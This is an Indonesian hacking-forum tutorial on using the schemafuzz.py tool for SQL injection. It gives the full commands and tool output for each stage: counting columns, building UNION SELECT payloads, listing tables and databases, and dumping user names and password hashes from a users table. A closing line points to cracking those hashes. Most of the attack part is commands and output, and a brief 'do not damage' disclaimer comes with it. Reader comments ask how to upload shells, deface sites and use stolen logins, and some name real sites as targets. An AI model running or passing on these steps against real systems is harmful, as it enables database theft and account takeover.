Binus Hacker - Independent Hacking Community   Subscribe to Binus Hacker Subscribe to Binus Hacker

SQL Injection Dengan SchemaFuzzy

28 February 2009
Penulis: Artikel   · Kategori Artikel: Tutorial

Binus Hacker Sponsor Banner


Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut

pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

–schema, –dbs, –dump, –fuzz, –info, –full, –findcol

langkah pertama

—————-

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–

[+] Evasion Used: “+” “–”

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns…

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

————–

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

—————

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D namadatabasenya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <– w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user–

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0]webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

langkah selanjutnya

——————–

cara untuk menemukan user dan password

kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dump -D webthing -T wt_users -C name,password

eing ing eng….

jreennnng….keluar deh user ama passwordnya

hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database “webthings” Table “wt_users”

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya

setelah itu tinggal kita meng crack passwordnya pake program

gemana rekan2 gampang kan pake schemafuzz

NB:

Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya…

program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya

Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.

Author    : Andr3^81
e-Mail    : andr3-81 [at] linuxmail [dot] org

Tags: , ,

Binus Hacker Sponsor Banner

Komentar

25 Komentar Untuk “SQL Injection Dengan SchemaFuzzy
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. zikura pada 7 March 2009 6:02 pm

    izin ngutip yah boss… saya sertakan juga sourcenya :)
    trims.

  2. nugrah lucu pada 20 March 2009 10:07 pm

    hag hag hag makasih kutip ah dicatat rapi2…hag hag hag

  3. nic34rt pada 9 April 2009 8:51 pm

    mau tanya…bagaimana mau dapat web login nya…setelah dapat pasaword dan usernamenya..

    tolong bantu saya..masuk ke weblogin/adminlogin..
    bagaimana ya..selain guan http://www.site.com/admin.php,login and ect
    ada tool yg blh di gunakan?

  4. utuhwibowo pada 11 April 2009 4:55 am

    Hmm.. di adminlogin finder
    darkc0de / hcky

    enjoy

  5. q2 pada 18 April 2009 1:00 am

    thanxs ya tutor nya ikutan copy ya

  6. adyt pada 19 April 2009 7:22 pm

    sory ni tutornya dapat dari mn ya?????

  7. utuhwibowo pada 21 April 2009 12:21 am

    implement rsouron darkc0de.com
    q:)

    Enjoy

  8. php_hack pada 22 April 2009 1:10 am

    saran aja bro

    ada baik nya jgn gtu cra penyajian ke temen2 yang masih newbi
    kasihan ntar

    di pertimbangkan ya…

  9. nic34rt pada 27 April 2009 6:45 am

    utuhwibowo
    Hmm.. di adminlogin finder
    darkc0de / hcky
    enjoy

    thanks bro..tool tu bnyak membantu…

    satu lagi mau tanya apa kegunaan “gSQLHarvest.py”
    dan bagaimana cara gunakan “gSQLHarvest.py”
    ada video tutorial kah? :)

  10. brondong pada 17 May 2009 6:29 am

    bro keren nih tutor nya, btw ada aplikasi sql inject gini yang konversi ke web gak yah..?

  11. brondong pada 17 May 2009 9:02 am

    bro kalo load_file nya YES gimana cara upload shellnya yah? tQ

  12. spykit pada 30 May 2009 3:30 am

    Izin kutip ya OM buat blog nih

  13. Harindra Darmawan pada 31 May 2009 3:57 am

    Halo bos, bisa minta tolong enggak nih.
    Saya mau ngetes web saya.
    Bagaimana caranya ngedapetin nama user dan password di website percobaan saya ini.

    alamatnya : http://www.takestuff.com/bisnis-cerdas/admin

    Tolong caranya di kirim ke email saya di

    rynz2009@gmail.com

  14. Youdha pada 27 June 2009 11:15 am

    Izin Sedot booss..
    lagi keram otak niihh…
    buat disccusion grup…
    Thx ya..

  15. qurol pada 9 July 2009 6:58 pm

    ini menggunakan unix yah osnya… numpang nanya jurgan ^^

  16. blackdos pada 5 August 2009 10:21 am

    minta di copy ya bank..

  17. buktikan pada 3 October 2009 4:05 am

    untuk para master hacking binus hacker, ada situs yang sepantasnya di binasakan

    http://www.tbd.my/ tu alamatnya, klo mank master gw tunggu hasilnya..

    thanks…

  18. dodol pada 6 October 2009 7:52 pm

    waaah web ini untuk katagori pemula apa yang udah mahirrrrr.. kasih katagori gt keq admin,
    biar dikit postingan asal mudah di mengerti oleh pemula, banyak banyak posting klo gak ngerti sama aja boong,

    btw thanks udah mau share, di tunggu posttingan yang lebih di mengerti

  19. texas pada 6 October 2009 10:33 pm

    bro.gue dapat SQL INJECTION dari suatu web,tapi bahasanya gue nggak ngerti tuh..lagi pula gue blum tahu gimana jalankannya..boleh khan gue minta masukan ama bro??kalo bro mau coba aplikasinya boleh email gue.entar gue kirimin utk test ujicoba..thanks yah bro..ditunggu kabarnya..

  20. texas pada 6 October 2009 10:49 pm

    WANNA MEET WITH US???#binushacker
    gimana nih bro..gue masuk langsung di banned?gimana mau konsultasi..bantuin donk bro…

  21. nakgundar pada 1 November 2009 10:34 pm

    KLO ANTAR KAMPUS DIADAIN PERTANDINGAN HACKING RAME PASTINYA..

    CONTOH UNIVERSITAS GUNADARMA VS BINUS
    menang mana??

  22. 4nb3 pada 21 November 2009 10:26 am

    Boz boleh nya ga’ carax ngedeface web dari awal campe akhi…tolong yach boz,,coz q dah baca tutor2,masih lom bisa juga…tolong ya bozzz

  23. bb pada 5 January 2010 3:55 pm

    kalo erro kaya gini nembusnya gimana
    http://photomystery.com/answer.php

  24. Wilzichi pada 21 February 2010 7:48 am

    izin copas mas..
    susah dmengertinya, wowoww..

  25. Hacking Dengan Schemafuzzy pada 22 August 2010 10:12 am

    [...] Jangan lupa baca juga artikel sebelumnya di: http://www.binushacker.net/sql-injection-dengan-schemafuzzy.html [...]

Silahkan Berikan Tanggapan Anda...